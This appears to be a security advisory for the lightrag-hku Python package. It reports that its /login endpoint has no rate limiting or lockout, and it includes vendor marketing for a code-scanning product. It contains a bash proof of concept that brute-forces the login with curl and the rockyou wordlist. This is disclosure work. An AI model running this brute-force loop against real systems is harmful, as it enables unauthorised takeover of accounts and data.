CRITICAL 9.1 PyPI

lightrag-hku: No Rate Limiting on /login Endpoint Allows Brute-Force Attacks

GHSA-frch-4w6v-q5xx · CVE-2026-85734

Published · Modified

AI SAST

Find this class of vulnerability in your own code

Corgea's AI-native static analysis detects vulnerabilities like this one across your repositories, ranks them by exploitability, and returns review-ready fixes.

Description

Summary

The POST /login endpoint has no rate limiting, account lockout, or delay on failed attempts. An attacker can submit unlimited password guesses at full network speed.

Details

# lightrag/api/lightrag_server.py:2161
@app.post("/login")
async def login(form_data: OAuth2PasswordRequestForm = Depends()):
    if not auth_handler.verify_password(username, form_data.password):
        raise HTTPException(status_code=401, detail="Incorrect credentials")
    # No: rate limit / lockout / backoff / CAPTCHA / attempt counter

A search for slowapi, rate_limit, lockout, or throttle in lightrag/api/ returns zero results.

PoC

# Brute-force /login with a wordlist, no throttling
while IFS= read -r pass; do
  code=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST http://<TARGET>:9621/login \
    -d "username=admin&password=${pass}")
  [ "$code" = "200" ] && echo "[FOUND] $pass" && break
done < /usr/share/wordlists/rockyou.txt

Impact

Improper restriction of authentication attempts. Any network-reachable attacker can brute-force user passwords without restriction. Once credentials are recovered, the attacker gains full authenticated access to all documents, knowledge graph, and administrative operations.

Ready to move

Start Securing

Free, no credit card | First findings in minutes